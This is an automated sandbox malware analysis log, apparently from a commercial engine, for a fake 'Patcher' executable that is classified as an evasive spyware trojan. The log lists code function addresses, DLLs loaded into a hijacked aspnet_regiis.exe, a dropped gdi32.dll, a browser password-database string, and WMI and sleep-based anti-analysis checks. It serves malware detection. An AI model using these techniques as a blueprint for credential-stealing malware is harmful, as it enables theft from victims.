                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE0AEA40_2_6CE0AEA4
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE29EB00_2_6CE29EB0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE166600_2_6CE16660
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE1F6490_2_6CE1F649
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE3CFC00_2_6CE3CFC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE35FA00_2_6CE35FA0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE0DF800_2_6CE0DF80
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE1F7960_2_6CE1F796
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFBF500_2_6CDFBF50
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFF7600_2_6CDFF760
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFEF000_2_6CDFEF00
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE057060_2_6CE05706
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE027100_2_6CE02710
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE16F100_2_6CE16F10
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE040F00_2_6CE040F0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE348B00_2_6CE348B0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE1D0290_2_6CE1D029
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE0B9E00_2_6CE0B9E0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE3C9F00_2_6CE3C9F0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE009C00_2_6CE009C0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE081D00_2_6CE081D0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE351D00_2_6CE351D0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE1B9B00_2_6CE1B9B0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE171700_2_6CE17170
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE129750_2_6CE12975
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE16A700_2_6CE16A70
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE063C70_2_6CE063C7
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFFBF00_2_6CDFFBF0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE02BA00_2_6CE02BA0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE21B800_2_6CE21B80
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE18B900_2_6CE18B90
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE3C3700_2_6CE3C370
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE163200_2_6CE16320
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE393300_2_6CE39330
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE1033F0_2_6CE1033F
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDFC3300_2_6CDFC330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C83BC02_2_72C83BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7BB802_2_72C7BB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C4C3062_2_72C4C306
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C810922_2_72C81092
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C488502_2_72C48850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6E87F2_2_72C6E87F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C831F02_2_72C831F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C4D9722_2_72C4D972
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C657E12_2_72C657E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C687802_2_72C68780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C497A02_2_72C497A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7BDD02_2_72C7BDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C59AC02_2_72C59AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C60AC02_2_72C60AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C442E02_2_72C442E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C782F42_2_72C782F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C51AA42_2_72C51AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C722A32_2_72C722A3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C74AA02_2_72C74AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C70AB02_2_72C70AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7B2502_2_72C7B250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5D2602_2_72C5D260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C662702_2_72C66270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C753D32_2_72C753D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C69BDE2_2_72C69BDE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C54B802_2_72C54B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C663962_2_72C66396
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7CBA02_2_72C7CBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6FBBB2_2_72C6FBBB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C42B502_2_72C42B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C463602_2_72C46360
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7D36B2_2_72C7D36B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C68B702_2_72C68B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C45B002_2_72C45B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C493102_2_72C49310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5DB102_2_72C5DB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5732C2_2_72C5732C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6732C2_2_72C6732C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6AB3C2_2_72C6AB3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C620C02_2_72C620C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C838F02_2_72C838F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C828892_2_72C82889
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C660B02_2_72C660B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C490502_2_72C49050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C788112_2_72C78811
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C680302_2_72C68030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7F8302_2_72C7F830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C4B1A02_2_72C4B1A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5C1BB2_2_72C5C1BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6B9102_2_72C6B910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6B1112_2_72C6B111
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C439302_2_72C43930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C72EDE2_2_72C72EDE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C556D82_2_72C556D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C68E802_2_72C68E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C55E632_2_72C55E63
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5D6702_2_72C5D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C826702_2_72C82670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C44E002_2_72C44E00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C4CFC72_2_72C4CFC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C467F02_2_72C467F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6978A2_2_72C6978A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5F7902_2_72C5F790
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C827B02_2_72C827B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C82F702_2_72C82F70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5CF202_2_72C5CF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C42F302_2_72C42F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7FF302_2_72C7FF30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C56F3F2_2_72C56F3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C804D02_2_72C804D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C4ACF02_2_72C4ACF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C564F82_2_72C564F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6F4A42_2_72C6F4A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7B4B02_2_72C7B4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6B40D2_2_72C6B40D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C824102_2_72C82410
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C63C292_2_72C63C29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C475C02_2_72C475C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C4EDD02_2_72C4EDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C525E02_2_72C525E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C81DE12_2_72C81DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C835F02_2_72C835F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C76D802_2_72C76D80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C65DA02_2_72C65DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C75DB32_2_72C75DB3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C625B02_2_72C625B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C6FD422_2_72C6FD42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C765582_2_72C76558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C595672_2_72C59567
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C5DD702_2_72C5DD70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 72C54B70 appears 114 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 72C48060 appears 54 times
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: String function: 6CE01460 appears 54 times
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: String function: 6CDE7AD0 appears 33 times
                Source: Patcher_I5cxa9AN.exe, 00000000.00000000.1643786311.0000000000312000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUlyssesUlyssesFelix.lnkaFfH4 vs Patcher_I5cxa9AN.exe
                Source: Patcher_I5cxa9AN.exe, 00000000.00000002.1656651240.000000000097E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Patcher_I5cxa9AN.exe
                Source: Patcher_I5cxa9AN.exeBinary or memory string: OriginalFilenameUlyssesUlyssesFelix.lnkaFfH4 vs Patcher_I5cxa9AN.exe
                Source: Patcher_I5cxa9AN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@1/1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C7BDD0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_72C7BDD0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
                Source: Patcher_I5cxa9AN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Patcher_I5cxa9AN.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: aspnet_regiis.exe, 00000002.00000003.1673153919.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1673447609.00000000053B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe "C:\Users\user\Desktop\Patcher_I5cxa9AN.exe"
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Patcher_I5cxa9AN.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Patcher_I5cxa9AN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CDF2CA6 push ecx; ret 0_2_6CDF2CB9
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 0_2_6CE3B7B0 push eax; mov dword ptr [esp], 565150A3h0_2_6CE3B7B4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C823B0 push eax; mov dword ptr [esp], 565150A3h2_2_72C823B4
                Source: Patcher_I5cxa9AN.exeStatic PE information: section name: .text entropy: 7.023884578280009
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7356Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7356Thread sleep time: -30000s >= -30000sJump to behavior
